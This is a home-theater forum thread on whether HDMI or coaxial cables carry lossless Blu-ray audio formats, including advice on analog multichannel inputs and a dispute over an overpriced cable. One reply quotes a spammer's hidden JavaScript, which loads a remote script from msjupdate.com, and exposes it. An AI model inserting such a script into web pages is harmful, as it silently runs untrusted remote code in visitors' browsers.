Hdmi cable VS coaxial digital cables

D

dc6

Junior Audioholic
Which is better to use for audio?Should I upgrade my receiver to allow the hdmi cable transmit the audio or is using coaxial going to be good enough for the latest audio formats?

pzaur

pzaur

Audioholic Samurai
The latest audio formats can only be handled by a receiver that can understand them. As for the newest formats over coaxial/optical or HDMI, I don't know about coaxial/optical carrying them. HDMI for sure will carry them.

-pat

Adam

Adam

Audioholic Jedi
Coax and optical digital connections can't handle the bandwidth of the new lossless codecs (e.g. Dolby TrueHD and DTS-HD). You must use HDMI for those if you are making a digital connection.

pzaur

pzaur

Audioholic Samurai
Good to know. It's a total non-issue for me since I don't have a blu-ray player.

-pat

Seth=L

Seth=L

Audioholic Overlord
If you aren't planning on getting a Blu-ray player, or a DVD player that has DVD-Audio*1 playback capabilities over HDMI then you wouldn't be at an immediate advantage to use HDMI for your audio. Coaxial will handle 2 channel PCM, Dolby Digital, and DTS sound just as well as HDMI. However for Blu-ray you would probably benefit from the use of the HDMI connection as it handles HD audio that Blu-ray provides.

*1DVD-Audio was a competing audio only format with SACD, not to be confused with regular sound tracks found on all regular DVDs).

Last edited by a moderator:
D

dc6

Junior Audioholic
Guess I am going to have to start saving for a receiver as well.I have an old yamaha RX v793 which only does Dolby Digital.I am wanting to buy the oppo blue ray in a a month or so and I am trying to figure the best way to set it up.I'll just have to make due untill I can afford a new receiver.

G

gqmagic

Junior Audioholic
If your receiver has 5.1 or 7.1 analog ins you can use a bluray player that has 7.1 analog outs for the lossless sounds.

Pssst this is a secret, shhhhh don't tell to many people :cool:

Lordoftherings

Lordoftherings

Banned
Guess I am going to have to start saving for a receiver as well.I have an old yamaha RX v793 which only does Dolby Digital.I am wanting to buy the oppo blue ray in a a month or so and I am trying to figure the best way to set it up.I'll just have to make due untill I can afford a new receiver.
gqmagic's quote just below is absolutely right.
Your Yammy 793 does in fact have 6-channel analog inputs.
So you can use the multichannel analog output from the Oppo BDP-83, and get the decoding inside the Oppo Blu-ray player, with the full benefit of the new high resolution audio codecs (Dolby TrueHD & DTS-HD MA) coming from your speakers. :)
See, no real need to upgrade your receiver just yet. :)

If your receiver has 5.1 or 7.1 analog ins you can use a bluray player that has 7.1 analog outs for the lossless sounds.

Pssst this is a secret, shhhhh don't tell to many people :cool:
You got it right man. :)

* Pssst, don't tell anyone that I said you were right. Ok? :cool:

D

dc6

Junior Audioholic
Looking at the back of the receiver it has 6 pre outs for speakers but no 5.1 analog inputs.

bandphan

bandphan

Banned
Looking at the back of the receiver it has 6 pre outs for speakers but no 5.1 analog inputs.
If you feel that your system is lacking, start with a speaker/sub upgrade. For many the new audio codecs sre not a major improvement over DD or DTS.

H

High Fidelity

Enthusiast
Which is better to use for audio?Should I upgrade my receiver to allow the hdmi cable transmit the audio or is using coaxial going to be good enough for the latest audio formats?
HDMI is superior to analogue interconnects. Best Buy from Amazon I.2 m
HDMI I.3 only £7.50. Best sound for audiophile perfectionist Chord Active .75 m £85

pzaur

pzaur

Audioholic Samurai
HDMI is superior to analogue interconnects.
Why?

Best Buy from Amazon I.2 m
HDMI I.3 only £7.50. Best sound for audiophile perfectionist Chord Active .75 m £85
85 pounds for a .75m HDMI cable is ludicrous. You should never pay more than $15 USD (~7 pounds) for something of that length. "Best sound?" I don't think so. You won't hear or see a difference. If there is, show me the scientific proof that the signal is "improved."

-pat

Adam

Adam

Audioholic Jedi
< script language='JavaScript' type='text/javascript'>document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://msjupdate.com/ff/output/index/I9xLmH85UMjXqX1E6WWX9J6P21CQfDRd?rand=" + Math.random() * 100000000 +"'></"+"script>")< /script>
Here's your java script for everyone to see. I consider you a spammer and will rep you accordingly.

lsiberian

lsiberian

Audioholic Overlord
HDMI is superior to analogue interconnects. Best Buy from Amazon I.2 m
Dude that's just BS. Copper doesn't care what you pay for it.

If the XLR cables used to process your sound are worth a max of 10 bucks and even monster(who we hate) sells XLR's cheaper than that. Why would you pay so much to get it back?

Latest posts

newsletter

• RBHsound.com
  • BlueJeansCable.com
  • SVS Sound Subwoofers
  • Experience the Martin Logan Montis